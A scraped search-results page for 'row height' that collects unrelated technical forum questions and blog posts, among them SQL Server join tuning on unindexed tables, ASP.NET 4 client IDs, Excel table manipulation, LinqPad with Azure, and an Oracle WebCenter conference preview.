Search Results

Search found 17528 results on 702 pages for 'row height'.


  • Is it possible to have a cell in table1 "point to" a cell in table2?

    - by Lewray
    I have a hierarchical structure in a database-driven software application. Each row in parentTable 'owns' a number of rows in childTable. If a childTable row does not have a value set in columnA, then it should return the value specified in columnB of the corresponding parentTable row. Is it possible to implement a pointer or cell reference somehow, so that I do not have to copy values from parent to child? (A change in the parent could otherwise result in a large number of changes in the child.) If this is not possible, could anyone suggest a different approach?
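
    There is no native cell-pointer mechanism in SQL, but a common approach (a sketch; the table and column names come from the question, the key column names are assumed) is to leave childTable.columnA NULL and resolve the fallback at read time with COALESCE:

        -- Reads fall back to the parent's columnB when the child has no value.
        CREATE VIEW childWithFallback AS
        SELECT c.childId,
               c.parentId,
               COALESCE(c.columnA, p.columnB) AS effectiveValue
        FROM childTable c
        JOIN parentTable p ON p.parentId = c.parentId;

    A change in the parent is then picked up by every child automatically, with no copying.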


  • Netbook screen too small, Software fix?

    - by LantisGaius
    I have a netbook with a maximum screen resolution of 1024x600. I'm dual-booting Ubuntu 10.10 and BackTrack 4 R2, and I'm having trouble with windows whose height is larger than 600px: buttons end up below the screen, and I can't click OK, Cancel, or Apply. When my OS was still Windows 7, I didn't have any problems, because I could resize all of the windows I use. In Linux, most windows (especially in the KDE settings) have a fixed height. Are there any workarounds for my problem?


  • Transpose matrix-style table to 3 columns in Excel

    - by polarbear2k
    I have a matrix-style table in Excel where B1:Z1 are column headings and A2:A99 are row headings. I would like to convert this table to a 3-column table (column heading, row heading, cell value). It does not matter in what order the new table is. For a small example with headings H1-H3, row labels R1-R3, and values V1-V9:

           A    B    C    D
        1       H1   H2   H3
        2  R1   V1   V2   V3
        3  R2   V4   V5   V6
        4  R3   V7   V8   V9

    should become either of these (both orders are fine):

           A    B    C           A    B    C
        1  H1   R1   V1       1  H1   R1   V1
        2  H1   R2   V4       2  H2   R1   V2
        3  H1   R3   V7       3  H3   R1   V3
        4  H2   R1   V2       4  H1   R2   V4
        5  H2   R2   V5       5  H2   R2   V5
        6  H2   R3   V8       6  H3   R2   V6
        7  H3   R1   V3       7  H1   R3   V7
        8  H3   R2   V6       8  H2   R3   V8
        9  H3   R3   V9       9  H3   R3   V9

    I've been playing around with the OFFSET function to create the whole table, but I feel like a combination of TRANSPOSE and V/HLOOKUP is required. Thanks
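
    One formula-only sketch (ranges assume the small example above, with headings in B1:D1, row labels in A2:A4, and values in B2:D4; the three formulas are entered in row 1 of three empty columns and filled down nine rows):

        Column heading: =INDEX($B$1:$D$1, MOD(ROW()-1,3)+1)
        Row heading:    =INDEX($A$2:$A$4, INT((ROW()-1)/3)+1)
        Cell value:     =INDEX($B$2:$D$4, INT((ROW()-1)/3)+1, MOD(ROW()-1,3)+1)

    For the real B1:Z1 / A2:A99 table, replace the 3s with 25 (the number of heading columns) and widen the ranges to match.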


  • Search Replace extended in a html file

    - by Fake4d
    I have a little question. I have a big HTML file and want to replace lots of things inside it, many times over. The only replacement I can't solve is one that involves a variable part. Example:

        <image src="start_files\0002.jpg" style="width:216pt; height:162">

    should be transformed into

        <a href="start_files\0002.jpg" target="_blank"><image src="start_files\0002.jpg" style="width:216pt; height:162"></a>

    Do you have an idea how to do it? I have a Windows system with Notepad2 and Notepad++, and I could install a new tool if needed (like Windows sed). The best solution would be a batch solution to which I can add other transformations. Hope you have got good ideas! Thanks in advance, Fake4d
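
    A minimal Python sketch (file names assumed) that performs this transformation for every such image tag, using the tag's own src as the link target; more transformations can be added as extra patterns in the same script:

        import re

        with open('start.html', encoding='utf-8') as f:   # input file name assumed
            html = f.read()

        # Wrap each <image ...> tag in an anchor that points at the tag's own src.
        pattern = re.compile(r'(<image src="([^"]+)"[^>]*>)')
        html = pattern.sub(r'<a href="\2" target="_blank">\1</a>', html)

        with open('start_out.html', 'w', encoding='utf-8') as f:
            f.write(html)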


  • Include new rows in autofilter range

    - by user9645
    I am working with an Excel 2007 worksheet that has the filter applied, so that each column heading has a pull-down menu for sorting. When I add new rows to the end of the table by cut-and-paste from the last row, these new rows are not included in the sorting. I can't seem to get the newly added rows included in the filter range. I tried un-selecting and re-selecting the Filter button and also tried the Reapply button; the Clear button is always greyed out. I can't seem to find any relevant help for this online anywhere. Not sure if it matters, but the heading row and the first column are frozen (they don't scroll with the rest of the table).


  • MSSQL 2005 Snapshot Agent Uses 100% CPU

    - by matth1jd
    When setting up a new subscription to a publication (transactional replication) from 64-bit SQL Server 2005 to 64-bit SQL Server 2005, the Snapshot Agent on the publisher consumes 100% of the CPU. I am using SSMS to create the new subscription. My initial impression was that this could be caused by row locking during generation of the snapshot, but I have read that a concurrent snapshot is generated by default in SQL Server 2005, so row locking shouldn't be a concern. As this is a production server, I would like to be able to initialize replication without bringing the box to its knees. Any suggestions would be helpful and appreciated.
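
    One diagnostic worth running first (a sketch; the publication name is hypothetical) is to confirm from the publisher that the publication really is configured for a concurrent snapshot:

        -- Run in the publication database; inspect the sync_method column of the
        -- result ('concurrent' avoids holding table locks for the whole snapshot).
        EXEC sp_helppublication @publication = N'MyPublication';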


  • Need a solution to store images (1 billion, i.e. 1,000,000,000) which users will upload to a website via PHP or JavaScript upload

    - by wish_you_all_peace
    I need a solution to store one billion images that users will upload to a website via PHP or JavaScript (the site will serve a billion page views a month, on Linux Debian distros), assuming a maximum of 20 photos per user: 10 thumbnails of 90px by 90px, and 10 large, script-resized images with a maximum width or height of 500px depending on the shape of the image (square, landscape, portrait, etc.). Assume this to be a LEMP-stack (Linux, Nginx, MySQL, PHP) social-media or social-matchmaking type application whose content will be text and images. Since everyone knows that storing tons of user-uploaded images inside a single directory, plain NFS share, etc. is bad, please explain the architecture and configuration of the entire storage setup you would recommend for one billion images (no third-party cloud storage like S3; it has to be within the private data center using our own hardware and resources). The solution has to cover both the storage itself and the organization of the uploaded images. How should we organize the users' images, given that a single user will have no more than 20 (10 thumbnails and 10 large, with width or height capped at 500px)? Please consider that this has to be organized in a structured way, so we can fetch a single user's images programmatically via PHP/JavaScript or an API, through some kind of unique user identifier.
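
    As an illustration only (a PHP sketch with hypothetical paths and names, not a full architecture): the standard way to keep any one directory small is to fan the files out over a hash of the user's unique ID, which also makes every image fetchable from the ID alone:

        <?php
        // Sketch: two-level directory fan-out derived from the user's unique id.
        // 256 * 256 = 65,536 leaf directories; at 1B images / 20 per user that is
        // roughly 760 user directories per leaf.
        function userImageDir(string $userId): string {
            $h = md5($userId); // stable hash of the user id
            return '/data/images/' . substr($h, 0, 2) . '/' . substr($h, 2, 2) . '/' . $userId;
        }
        // e.g. /data/images/ab/3f/123456/thumb_01.jpg
        //      /data/images/ab/3f/123456/large_01.jpg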


  • LinqPad with Azure Table Storage

    - by Sarang
    LinqPad, as we all know, has been a wonderful tool for running ad-hoc queries. With Windows Azure Table storage in the picture, LinqPad was no longer an option, and we shifted focus to Cloud Storage Studio, only to realize the limited and strange querying capabilities of CSS. With some tweaking of LinqPad, we can get the comfortable old shoe of ad-hoc queries back against Windows Azure Table storage. Steps:

    1. Start LinqPad.
    2. Right-click in the query window and select "Query Properties".
    3. In Additional References, add references to Microsoft.WindowsAzure.StorageClient, System.Data.Services.Client.dll, and the assembly containing the implementation of the DataServiceContext class tied to Windows Azure Table storage.
    4. In Additional Namespace Imports, import the same three namespaces mentioned above.
    5. Then we need to provide the following details:
       a. Table storage account name and shared key.
       b. The DataServiceContext-implementing class in your code.
       c. A LINQ query.

    For example:

        var storageAccountName = "myStorageAccount"; // Enter valid storage account name
        var storageSharedKey = "mysharedKey";        // Enter valid storage account shared key
        var uri = new System.Uri("http://table.core.windows.net/");
        var storageAccountInfo = new CloudStorageAccount(new StorageCredentialsAccountKey(storageAccountName, storageSharedKey), false);
        var serviceContext = new TweetPollDataServiceContext(storageAccountInfo); // Specify the DataServiceContext implementation

        // The query
        var query = from row in serviceContext.Table
                    select row;

        query.Dump();

    Thanks LinqPad!


  • Cleaner HTML Markup with ASP.NET 4 Web Forms - Client IDs (VS 2010 and .NET 4.0 Series)

    - by ScottGu
    This is the sixteenth in a series of blog posts I'm doing on the upcoming VS 2010 and .NET 4 release. Today's post is the first of a few blog posts I'll be doing that talk about some of the important changes we've made to make Web Forms in ASP.NET 4 generate clean, standards-compliant, CSS-friendly markup. Today I'll cover the work we are doing to provide better control over the "ID" attributes rendered by server controls to the client. [In addition to blogging, I am also now using Twitter for quick updates and to share links. Follow me at: twitter.com/scottgu]

    Clean, Standards-Based, CSS-Friendly Markup

    One of the common complaints developers have often had with ASP.NET Web Forms is that when using server controls they don't have the ability to easily generate clean, CSS-friendly output and markup. Some of the specific complaints with previous ASP.NET releases include:

    - Auto-generated ID attributes within HTML make it hard to write JavaScript and style with CSS
    - Use of tables instead of semantic markup for certain controls (in particular the asp:menu control) makes styling ugly
    - Some controls render inline style properties even if no style property on the control has been set
    - ViewState can often be bigger than ideal

    ASP.NET 4 provides better support for building standards-compliant pages out of the box. The built-in <asp:> server controls with ASP.NET 4 now generate cleaner markup and support CSS styling – and help address all of the above issues.

    Markup Compatibility When Upgrading Existing ASP.NET Web Forms Applications

    A common question people often ask when hearing about the cleaner markup coming with ASP.NET 4 is "Great - but what about my existing applications? Will these changes/improvements break things when I upgrade?" To help ensure that we don't break assumptions around markup and styling with existing ASP.NET Web Forms applications, we've enabled a configuration flag – controlRenderingCompatibilityVersion – within web.config that lets you decide if you want to use the new cleaner markup approach that is the default with new ASP.NET 4 applications, or for compatibility reasons render the same markup that previous versions of ASP.NET used. When the controlRenderingCompatibilityVersion flag is set to "3.5", your application and server controls will by default render output using the same markup generation used with VS 2008 and .NET 3.5. When the controlRenderingCompatibilityVersion flag is set to "4.0", your application and server controls will strictly adhere to the XHTML 1.1 specification, have cleaner client IDs, render with semantic correctness in mind, and have extraneous inline styles removed. This flag defaults to 4.0 for all new ASP.NET Web Forms applications built using ASP.NET 4. Any previous application that is upgraded using VS 2010 will have the controlRenderingCompatibilityVersion flag automatically set to 3.5 by the upgrade wizard to ensure backwards compatibility. You can then optionally change it (either at the application level, or scope it within the web.config file to a per-page or directory level) if you move your pages to use CSS and take advantage of the new markup rendering.

    Today's Cleaner Markup Topic: Client IDs

    The ability to have clean, predictable ID attributes on rendered HTML elements is something developers have long asked for with Web Forms (ID values like "ctl00_ContentPlaceholder1_ListView1_ctrl0_Label1" are not very popular).
    Having control over the ID values rendered helps make it much easier to write client-side JavaScript against the output, makes it easier to style elements using CSS, and on large pages can help reduce the overall size of the markup generated.

    New ClientIDMode Property on Controls

    ASP.NET 4 supports a new ClientIDMode property on the Control base class. The ClientIDMode property indicates how controls should generate client ID values when they render. The ClientIDMode property supports four possible values:

    - AutoID – Renders the output as in .NET 3.5 (auto-generated IDs which will still render prefixes like ctl00 for compatibility)
    - Predictable (Default) – Trims any "ctl00" ID string and, if in a list/container control, concatenates child IDs (example: id="ParentControl_ChildControl")
    - Static – Hands over full ID naming control to the developer: whatever they set as the ID of the control is what is rendered (example: id="JustMyId")
    - Inherit – Tells the control to defer to the naming behavior mode of the parent container control

    The ClientIDMode property can be set directly on individual controls (or within container controls – in which case the controls within them will by default inherit the setting). Or it can be specified at a page or usercontrol level (using the <%@ Page %> or <%@ Control %> directives) – in which case controls within the pages/usercontrols inherit the setting (and can optionally override it). Or it can be set within the web.config file of an application – in which case pages within the application inherit the setting (and can optionally override it). This gives you the flexibility to customize/override the naming behavior however you want.

    Example: Using the ClientIDMode property to control the IDs of Non-List Controls

    Let's take a look at how we can use the new ClientIDMode property to control the rendering of "ID" elements within a page. To help illustrate this we can create a simple page called "SingleControlExample.aspx" that is based on a master page called "Site.Master", and which has a single <asp:label> control with an ID of "Message" that is contained within an <asp:content> container control called "MainContent". Within our code-behind we'll then add some simple code to dynamically populate the Label's Text property at runtime. If we were running this application using ASP.NET 3.5 (or had our ASP.NET 4 application configured to run using 3.5 rendering or ClientIDMode=AutoID), the generated markup sent down to the client would carry an ID that is unique (which is good) – but rather ugly because of the "ctl00" prefix (which is bad).

    Markup Rendering when using ASP.NET 4 and the ClientIDMode is set to "Predictable"

    With ASP.NET 4, server controls by default now render their IDs using ClientIDMode="Predictable". This helps ensure that ID values are still unique and don't conflict on a page, but at the same time it makes the IDs less verbose and more predictable. With ASP.NET 4, the "ctl00" prefix is gone from the generated markup of our <asp:label> control above. Because the "Message" control is embedded within a "MainContent" container control, by default its ID will be prefixed "MainContent_Message" to avoid potential collisions with other controls elsewhere within the page.
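
    Concretely, a sketch of the two renderings described above for the "Message" label, plus the application-level web.config setting (the label text is assumed; the IDs are the ones named in the text):

        <!-- web.config: application-wide default -->
        <system.web>
          <pages clientIDMode="Predictable" />
        </system.web>

        <!-- Rendered with ClientIDMode=AutoID (3.5-style markup) -->
        <span id="ctl00_MainContent_Message">Hello World</span>

        <!-- Rendered with ClientIDMode=Predictable (the ASP.NET 4 default) -->
        <span id="MainContent_Message">Hello World</span>
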
    Markup Rendering when using ASP.NET 4 and the ClientIDMode is set to "Static"

    Sometimes you don't want your ID values to be nested hierarchically, though, and instead just want the ID rendered to be whatever value you set it as. To enable this you can now use ClientIDMode=Static, in which case the ID rendered will be exactly what you set on the server side for your control. This option gives you the ability to completely control the client ID values sent down by controls.

    Example: Using the ClientIDMode property to control the IDs of Data-Bound List Controls

    Data-bound list/grid controls have historically been the hardest to use/style when it comes to working with Web Forms' automatically generated IDs. Let's now take a look at a scenario where we'll customize the IDs rendered using a ListView control with ASP.NET 4. The code snippet below is an example of a ListView control that displays the contents of a data-bound collection — in this case, airports. We can then write code within our code-behind to dynamically databind a list of airports to the ListView above. At runtime this will then by default generate a <ul> list of airports. Note that because the <ul> and <li> elements in the ListView's template are not server controls, no IDs are rendered in our markup.

    Adding Client IDs to Each Row Item

    Now, let's say that we wanted to add client IDs to the output so that we can programmatically access each <li> via JavaScript. We want these IDs to be unique, predictable, and identifiable. A first approach would be to mark each <li> element within the template as being a server control (by giving it a runat=server attribute) and by giving each one an id of "airport". By default ASP.NET 4 will now render clean IDs (no ctl00-style IDs are rendered).

    Using the ClientIDRowSuffix Property

    Our template above now generates unique IDs for each <li> element – but if we are going to access them programmatically on the client using JavaScript, we might want to instead have the IDs contain the airport code within them to make them easier to reference. The good news is that we can easily do this by taking advantage of the new ClientIDRowSuffix property on databound controls in ASP.NET 4 to better control the IDs of our individual row elements. To do this, we'll set the ClientIDRowSuffix property to "Code" on our ListView control. This tells the ListView to use the databound "Code" property from our Airport class when generating the ID. And now instead of having row suffixes like "1", "2", and "3", we'll instead have the Airport.Code value embedded within the IDs (e.g. _CLE, _CAK, _PDX, etc). You can use this ClientIDRowSuffix approach with other databound controls like the GridView as well. It is useful anytime you want to program row elements on the client – and use clean, identifiable IDs to easily reference them from JavaScript code.

    Summary

    ASP.NET 4 enables you to generate much cleaner HTML markup from server controls and from within your Web Forms applications. In today's post I covered how you can now easily control the client ID values that are rendered by server controls. In upcoming posts I'll cover some of the other markup improvements that are also coming with the ASP.NET 4 release. Hope this helps, Scott


  • SpriteBatch being drawn outside of Stage?

    - by pyko
    Currently working on my first game, though running into some problems with libgdx and screen aspect ratio. What I have is a Stage which contains things like menu buttons etc., and the rest of the game is pretty much sprites being drawn via SpriteBatch. To avoid having multiple SpriteBatches and cameras, I have re-used the ones that are created when the Stage is created:

        stage = new Stage(WIDTH, HEIGHT, true); // keep aspect ratio
        batch = stage.getSpriteBatch();
        camera = (OrthographicCamera) stage.getCamera();
        // move camera so 'active' screen is centred
        stage.getCamera().translate(-stage.getGutterWidth(), -stage.getGutterHeight(), 0);

    Anything that is Stage/Actor related is drawn fine; it all stays within the aspect-ratio-adjusted boundaries. The problem I'm having is that anything drawn via SpriteBatch seems to ignore the viewport defined by the Stage and can be visible outside of the Stage area:

        batch.begin();
        ...
        sirWuffles.draw(batch);
        ...
        batch.end();

    For example, in the above, if Sir Wuffles is positioned outside of the defined WIDTH/HEIGHT, he might still appear in the "gutters" of the screen. I tried to explain it in the screenshot below: it uses an exaggerated screen ratio to make the gutters large, and I've covered most of the gutter area in a blue/cyan rectangle so they are very obvious. Does anyone know what is happening, and how to fix it? Currently, my "fix" is to use ShapeRenderer to draw rectangles that correspond to the gutters on top of the sprites...
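
    One workaround (a sketch, assuming the GL ES 2.0 interface; on the GL ES 1.x path use GL10 instead of GL20) is to clip the SpriteBatch drawing to the stage's 'active' area with a GL scissor box, using the gutter sizes the Stage already reports:

        // Clip SpriteBatch output to the area inside the gutters (screen pixels).
        int gx = (int) stage.getGutterWidth();
        int gy = (int) stage.getGutterHeight();
        Gdx.gl.glEnable(GL20.GL_SCISSOR_TEST);
        Gdx.gl.glScissor(gx, gy,
                Gdx.graphics.getWidth() - 2 * gx,
                Gdx.graphics.getHeight() - 2 * gy);
        batch.begin();
        sirWuffles.draw(batch);
        batch.end(); // end() flushes while the scissor is still active
        Gdx.gl.glDisable(GL20.GL_SCISSOR_TEST);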


  • Heaps of Trouble?

    - by Paul White NZ
    If you're not already a regular reader of Brad Schulz's blog, you're missing out on some great material. In his latest entry, he is tasked with optimizing a query run against tables that have no indexes at all. The problem is, predictably, that performance is not very good. The catch is that we are not allowed to create any indexes (or even new statistics) as part of our optimization efforts. In this post, I'm going to look at the problem from a slightly different angle, and present an alternative solution to the one Brad found. Inevitably, there's going to be some overlap between our entries, and while you don't necessarily need to read Brad's post before this one, I do strongly recommend that you read it at some stage; he covers some important points that I won't cover again here.

    The Example

    We'll use data from the AdventureWorks database, copied to temporary unindexed tables. A script to create these structures is shown below:

        CREATE TABLE #Custs
        (
            CustomerID INTEGER NOT NULL,
            TerritoryID INTEGER NULL,
            CustomerType NCHAR(1) COLLATE SQL_Latin1_General_CP1_CI_AI NOT NULL
        );
        GO
        CREATE TABLE #Prods
        (
            ProductMainID INTEGER NOT NULL,
            ProductSubID INTEGER NOT NULL,
            ProductSubSubID INTEGER NOT NULL,
            Name NVARCHAR(50) COLLATE SQL_Latin1_General_CP1_CI_AI NOT NULL
        );
        GO
        CREATE TABLE #OrdHeader
        (
            SalesOrderID INTEGER NOT NULL,
            OrderDate DATETIME NOT NULL,
            SalesOrderNumber NVARCHAR(25) COLLATE SQL_Latin1_General_CP1_CI_AI NOT NULL,
            CustomerID INTEGER NOT NULL
        );
        GO
        CREATE TABLE #OrdDetail
        (
            SalesOrderID INTEGER NOT NULL,
            OrderQty SMALLINT NOT NULL,
            LineTotal NUMERIC(38,6) NOT NULL,
            ProductMainID INTEGER NOT NULL,
            ProductSubID INTEGER NOT NULL,
            ProductSubSubID INTEGER NOT NULL
        );
        GO
        INSERT #Custs (CustomerID, TerritoryID, CustomerType)
        SELECT C.CustomerID, C.TerritoryID, C.CustomerType
        FROM AdventureWorks.Sales.Customer C WITH (TABLOCK);
        GO
        INSERT #Prods (ProductMainID, ProductSubID, ProductSubSubID, Name)
        SELECT P.ProductID, P.ProductID, P.ProductID, P.Name
        FROM AdventureWorks.Production.Product P WITH (TABLOCK);
        GO
        INSERT #OrdHeader (SalesOrderID, OrderDate, SalesOrderNumber, CustomerID)
        SELECT H.SalesOrderID, H.OrderDate, H.SalesOrderNumber, H.CustomerID
        FROM AdventureWorks.Sales.SalesOrderHeader H WITH (TABLOCK);
        GO
        INSERT #OrdDetail (SalesOrderID, OrderQty, LineTotal, ProductMainID, ProductSubID, ProductSubSubID)
        SELECT D.SalesOrderID, D.OrderQty, D.LineTotal, D.ProductID, D.ProductID, D.ProductID
        FROM AdventureWorks.Sales.SalesOrderDetail D WITH (TABLOCK);

    The query itself is a simple join of the four tables:

        SELECT P.ProductMainID AS PID, P.Name, D.OrderQty, H.SalesOrderNumber, H.OrderDate, C.TerritoryID
        FROM #Prods P
        JOIN #OrdDetail D
            ON P.ProductMainID = D.ProductMainID
            AND P.ProductSubID = D.ProductSubID
            AND P.ProductSubSubID = D.ProductSubSubID
        JOIN #OrdHeader H
            ON D.SalesOrderID = H.SalesOrderID
        JOIN #Custs C
            ON H.CustomerID = C.CustomerID
        ORDER BY P.ProductMainID ASC
        OPTION (RECOMPILE, MAXDOP 1);

    Remember that these tables have no indexes at all, and only the single-column sampled statistics SQL Server automatically creates (assuming default settings). The estimated query plan produced for the test query looks like this (click to enlarge):

    The Problem

    The problem here is one of cardinality estimation – the number of rows SQL Server expects to find at each step of the plan. The lack of indexes and useful statistical information means that SQL Server does not have the information it needs to make a good estimate.
    Every join in the plan shown above estimates that it will produce just a single row as output. Brad covers the factors that lead to the low estimates in his post. In reality, the join between the #Prods and #OrdDetail tables will produce 121,317 rows. It should not surprise you that this has rather dire consequences for the remainder of the query plan. In particular, it makes a nonsense of the optimizer's decision to use Nested Loops to join to the two remaining tables. Instead of scanning the #OrdHeader and #Custs tables once (as it expected), it has to perform 121,317 full scans of each. The query takes somewhere in the region of twenty minutes to run to completion on my development machine.

    A Solution

    At this point, you may be thinking the same thing I was: if we really are stuck with no indexes, the best we can do is to use hash joins everywhere. We can force the exclusive use of hash joins in several ways, the two most common being join and query hints. A join hint means writing the query using the INNER HASH JOIN syntax; using a query hint involves adding OPTION (HASH JOIN) at the bottom of the query. The difference is that using join hints also forces the order of the join, whereas the query hint gives the optimizer freedom to reorder the joins at its discretion. Adding the OPTION (HASH JOIN) hint results in this estimated plan: That produces the correct output in around seven seconds, which is quite an improvement! As a purely practical matter, and given the rigid rules of the environment we find ourselves in, we might leave things there. (We can improve the hashing solution a bit – I'll come back to that later on.)

    Faster Nested Loops

    It might surprise you to hear that we can beat the performance of the hash join solution shown above using nested loops joins exclusively, and without breaking the rules we have been set. The key to this part is to realize that a condition like (A = B) can be expressed as (A <= B) AND (A >= B). Armed with this tremendous new insight, we can rewrite the join predicates like so:

        SELECT P.ProductMainID AS PID, P.Name, D.OrderQty, H.SalesOrderNumber, H.OrderDate, C.TerritoryID
        FROM #OrdDetail D
        JOIN #OrdHeader H
            ON D.SalesOrderID >= H.SalesOrderID
            AND D.SalesOrderID <= H.SalesOrderID
        JOIN #Custs C
            ON H.CustomerID >= C.CustomerID
            AND H.CustomerID <= C.CustomerID
        JOIN #Prods P
            ON P.ProductMainID >= D.ProductMainID
            AND P.ProductMainID <= D.ProductMainID
            AND P.ProductSubID = D.ProductSubID
            AND P.ProductSubSubID = D.ProductSubSubID
        ORDER BY D.ProductMainID
        OPTION (RECOMPILE, LOOP JOIN, MAXDOP 1, FORCE ORDER);

    I've also added LOOP JOIN and FORCE ORDER query hints to ensure that only nested loops joins are used, and that the tables are joined in the order they appear. The new estimated execution plan is: This new query runs in under 2 seconds.

    Why Is It Faster?

    The main reason for the improvement is the appearance of the eager Index Spools, which are also known as index-on-the-fly spools. If you read my Inside The Optimiser series you might be interested to know that the rule responsible is called JoinToIndexOnTheFly. An eager index spool consumes all rows from the table it sits above, and builds an index suitable for the join to seek on. Taking the index spool above the #Custs table as an example, it reads all the CustomerID and TerritoryID values with a single scan of the table, and builds an index keyed on CustomerID. The term 'eager' means that the spool consumes all of its input rows when it starts up.
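
    In index terms, the spool over #Custs is building something roughly equivalent to the following (a sketch for illustration only; the rules of this exercise forbid us from actually creating it, and the engine builds its version internally):

        CREATE NONCLUSTERED INDEX ix_Custs_CustomerID
        ON #Custs (CustomerID)
        INCLUDE (TerritoryID);
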
    The index is built in a work table in tempdb, has no associated statistics, and only exists until the query finishes executing. The result is that each unindexed table is only scanned once, and just for the columns necessary to build the temporary index. From that point on, every execution of the inner side of the join is answered by a seek on the temporary index – not the base table. A second optimization is that the sort on ProductMainID (required by the ORDER BY clause) is performed early, on just the rows coming from the #OrdDetail table. The optimizer has a good estimate for the number of rows it needs to sort at that stage – it is just the cardinality of the table itself. The accuracy of the estimate there is important because it helps determine the memory grant given to the sort operation. Nested loops join preserves the order of rows on its outer input, so sorting early is safe. (Hash joins do not preserve order in this way, of course.) The extra lazy spool on the #Prods branch is a further optimization that avoids executing the seek on the temporary index if the value being joined (the 'outer reference') hasn't changed from the last row received on the outer input. It takes advantage of the fact that rows are still sorted on ProductMainID, so if duplicates exist, they will arrive at the join operator one after the other. The optimizer is quite conservative about introducing index spools into a plan, because creating and dropping a temporary index is a relatively expensive operation. Its presence in a plan is often an indication that a useful index is missing. I want to stress that I rewrote the query in this way primarily as an educational exercise – I can't imagine having to do something so horrible to a production system.

    Improving the Hash Join

    I promised I would return to the solution that uses hash joins. You might be puzzled that SQL Server can create three new indexes (and perform all those nested loops iterations) faster than it can perform three hash joins. The answer, again, is down to the poor information available to the optimizer. Let's look at the hash join plan again: Two of the hash joins have single-row estimates on their build inputs. SQL Server fixes the amount of memory available for the hash table based on this cardinality estimate, so at run time the hash join very quickly runs out of memory. This results in the join spilling hash buckets to disk, and any rows from the probe input that hash to the spilled buckets also get written to disk. The join process then continues, and may again run out of memory. This is a recursive process, which may eventually result in SQL Server resorting to a bailout join algorithm, which is guaranteed to complete eventually, but may be very slow. The data sizes in the example tables are not large enough to force a hash bailout, but it does result in multiple levels of hash recursion. You can see this for yourself by tracing the Hash Warning event using the Profiler tool. The final sort in the plan also suffers from a similar problem: it receives very little memory and has to perform multiple sort passes, saving intermediate runs to disk (the Sort Warnings Profiler event can be used to confirm this). Notice also that because hash joins don't preserve sort order, the sort cannot be pushed down the plan toward the #OrdDetail table, as in the nested loops plan. Ok, so now we understand the problems, what can we do to fix it?
We can address the hash spilling by forcing a different order for the joins: SELECT P.ProductMainID AS PID, P.Name, D.OrderQty, H.SalesOrderNumber, H.OrderDate, C.TerritoryID FROM #Prods P JOIN #Custs C JOIN #OrdHeader H ON H.CustomerID = C.CustomerID JOIN #OrdDetail D ON D.SalesOrderID = H.SalesOrderID ON P.ProductMainID = D.ProductMainID AND P.ProductSubID = D.ProductSubID AND P.ProductSubSubID = D.ProductSubSubID ORDER BY D.ProductMainID OPTION (MAXDOP 1, HASH JOIN, FORCE ORDER); With this plan, each of the inputs to the hash joins has a good estimate, and no hash recursion occurs.  The final sort still suffers from the one-row estimate problem, and we get a single-pass sort warning as it writes rows to disk.  Even so, the query runs to completion in three or four seconds.  That’s around half the time of the previous hashing solution, but still not as fast as the nested loops trickery. Final Thoughts SQL Server’s optimizer makes cost-based decisions, so it is vital to provide it with accurate information.  We can’t really blame the performance problems highlighted here on anything other than the decision to use completely unindexed tables, and not to allow the creation of additional statistics. I should probably stress that the nested loops solution shown above is not one I would normally contemplate in the real world.  It’s there primarily for its educational and entertainment value.  I might perhaps use it to demonstrate to the sceptical that SQL Server itself is crying out for an index. Be sure to read Brad’s original post for more details.  My grateful thanks to him for granting permission to reuse some of his material. Paul White Email: [email protected] Twitter: @PaulWhiteNZ


  • Oracle OpenWorld Preview: Oracle WebCenter Sessions You Won’t Want to Miss

    - by Christie Flanagan
    The beginning of Oracle OpenWorld is only a few short days away. This week on the WebCenter blog, we'll focus in on the sessions you definitely don't want to miss while you're in San Francisco next week. Monday, October 1 will be a day focused on strategy. Here are the sessions you want to add to your calendar: CON8268 - Oracle WebCenter Strategy: Engaging Your Customers.
    Empowering Your Business
    Monday, Oct 1, 10:45 AM - 11:45 AM - Moscone West - 3001

    Start things off with Oracle WebCenter's Christian Finn, Senior Director of Evangelism, and Roel Stalman, VP of Product Management, to learn more about the Oracle WebCenter strategy, and to understand where Oracle is taking the platform to help companies engage customers, empower employees, and enable partners. This session will also feature Richard Backx, Business IT Architect/Consultant for the Dutch telecom KPN. Richard has played a key role in the roll-out of WebCenter products for KPN's multibrand portals, with a specific focus on creating the best customer-journey platform for all the company's digital channels. Business success starts with ensuring that everyone is engaged with the right people and the right information and can access what they need through the channel of their choice: web, mobile, or social. Are you giving customers, employees, and partners the best-possible experience? Come learn how you can! Dig deeper into WebCenter's strategy for its ECM, portal, web experience management, and social collaboration offerings in the following sessions:

    CON8270 - Oracle WebCenter Content Strategy and Vision
    Monday, Oct 1, 12:15 PM - 1:15 PM - Moscone West - 3001

    Oracle WebCenter Content provides a strategic content infrastructure for managing documents, images, e-mails, and rich media files. With a single repository, organizations can address any content use case, such as accounts payable, HR onboarding, document management, compliance, records management, digital asset management, or Website management. In this session, learn about future plans for how Oracle WebCenter will address new use cases as well as new integrations with Oracle Fusion Middleware and Oracle Applications, leveraging your investments by making your users more productive and error-free.

    CON8269 - Oracle WebCenter Sites Strategy and Vision
    Monday, Oct 1, 1:45 PM - 2:45 PM - Moscone West - 3009

    Oracle's Web experience management solution, Oracle WebCenter Sites, enables organizations to use the online channel to drive customer acquisition and brand loyalty. It helps marketers and business users easily create and manage contextually relevant, social, interactive online experiences across multiple channels on a global scale. In this session, learn about future plans for how Oracle WebCenter Sites will provide you with the tools, capabilities, and integrations you need in order to continue to address your customers' evolving requirements for engaging online experiences and keep moving your business forward.

    CON8271 - Oracle WebCenter Portal Strategy and Vision
    Monday, Oct 1, 3:15 PM - 4:15 PM - Moscone West - 3001

    To innovate and keep a competitive edge, organizations need to leverage the power of agile and responsive Web applications. Oracle WebCenter Portal enables you to do just that, by delivering intuitive user experiences for enterprise applications to drive innovation with composite applications and mashups. Attend this session to learn firsthand from Oracle WebCenter Portal customers like the Los Angeles Department of Water and Power how it extends the value of existing enterprise applications, business processes, and content; delivers a superior business user experience; and maximizes limited IT resources.
    CON8272 - Oracle Social Network Strategy and Vision
    Monday, Oct 1, 4:45 PM - 5:45 PM - Moscone West - 3001

    One key way of increasing employee productivity is by bringing people, processes, and information together, providing new social capabilities to enable business users to quickly correspond and collaborate on business activities. Oracle WebCenter provides a user engagement platform with social and collaborative technologies to empower business users to focus on their key business processes, applications, and content in the context of their role and process. Attend this session to hear how the latest social capabilities in Oracle Social Network are enabling organizations to transform themselves into social businesses.

    Attention WebCenter Customers: Last Day to RSVP for WebCenter Customer Appreciation Reception

